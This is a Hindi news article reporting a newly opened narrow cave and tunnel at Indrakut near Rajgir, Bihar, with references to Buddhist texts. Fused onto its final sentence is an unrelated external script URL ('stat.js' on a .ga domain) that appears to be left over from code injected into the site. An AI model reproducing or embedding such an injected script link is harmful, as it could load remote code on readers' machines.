Bihar’s special news – राजगीर में सीआरपीएफ शिविर के समीप इंदकूट गुफा में मिला कुछ ऐसा के लोग हैरतज़दा रह गए।

 

 

बिहार,( कुल्सूम फात्मा )  आपको बता दें की बिहार में इंद कूट गुफा -मैं एक और लंबी गुफा मिली ये मेन गुफा तकरीबन 65 फीट लंबी है। इसमें एक और छोटी सुरंग है। यह शायद के मगध एरिया की सबसे छोटी सुरंग है

 

 

यदि हम विस्तार से बात करें तो बिहार इंदकूट गुफा जो राजगीर शहर से तकरीबन 7 किलोमीटर दूरी पर सीआरपीएफ कैंप शिविर के समीप राज गिर गया पहाड़ की हाथी मत्था चोटी पर स्थित है। और यह मैन गुफा तकरीबन 65 फीट लंबी है। इसमें एक छोटी और सुरंग है। यह मगध एरिया की सबसे पतली और तंग सुरंग है। इसकी लंबाई तकरीबन 50 फीट के आसपास होगी। यह इतनी तंग है की इसमें केवल एक व्यक्ति सिर्फ लेट कर ही जा सकता है

 

इस गुफा का राज नालंदा के साहित्यिक मंडली तथा शंखनाद की टीम और पुरातत्ववेताओं ने इसे 1 हफ्ते पूर्व लोगों के सामने खोला। और वहां के लोगों से जब बातचीत गई तो उन लोगों ने बताया के कई बार इस सुरंग को पार किया जा चुका है। यह हाथी मत्था खड़ी चोटी है। इस पर चढ़ना अन्य चोटियों की तरह आसान काम नहीं है। फिर भी काफी इसपर चढ़ने में मजा़ आता है।

 

 

भगवान बुद्ध ने जब ज्ञान प्राप्त करा उसके पश्चात यहां के स्थानीय लोगों को बताया था के इस गुफा के आसपास पहाड़ के ऊपर इंद्रजौ के पौधों की अधिक संख्या है पुरातत्ववेत्ता तुफैल अहमद खान सूरी तथा इतिहासकार डॉ लक्ष्मीकांत सिंह कहते हैं की इदं कूट गुफा का जिक्र कई किताबों में भी किया गया है। बौद्ध ग्रंथ, संयुक्त निकाय के पेज नंबर 206 सारपत्थपकसिनी, के पेज नंबर 300 पर और आर्कियोलॉजिकल सर्वे ऑफ इंडिया के जरिए 1936 में प्रकाशित डॉ विमलचूर्णला रचित राज ग्रह इन एनसी एंट लिटरेचर के पेज नंबर 15 पर इस गुफा का जिक्र किया गया है। इनमें कहा गया है कि गौतम बुद्ध ने यहां के लोगों को जीवन के राज़ से संबंधित जानकारियां प्रदान की थी।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.